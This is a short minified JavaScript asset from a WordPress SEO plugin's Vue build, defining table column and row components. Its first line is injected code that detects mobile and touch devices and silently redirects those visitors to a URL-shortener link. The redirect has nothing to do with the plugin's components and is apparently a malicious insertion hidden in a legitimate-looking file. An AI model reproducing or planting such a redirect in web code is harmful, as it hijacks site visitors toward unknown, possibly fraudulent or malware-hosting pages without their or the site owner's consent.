(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as t,i as e,B as s}from"./vendor-vue-ui.232c7c36.js";const c={},a={class:"aioseo-table-column"};function l(n,r){return t(),e("div",a,[s(n.$slots,"default")])}const m=o(c,[["render",l]]),u={},i={class:"aioseo-table-row"};function _(n,r){return t(),e("div",i,[s(n.$slots,"default")])}const d=o(u,[["render",_]]);export{d as T,m as a};
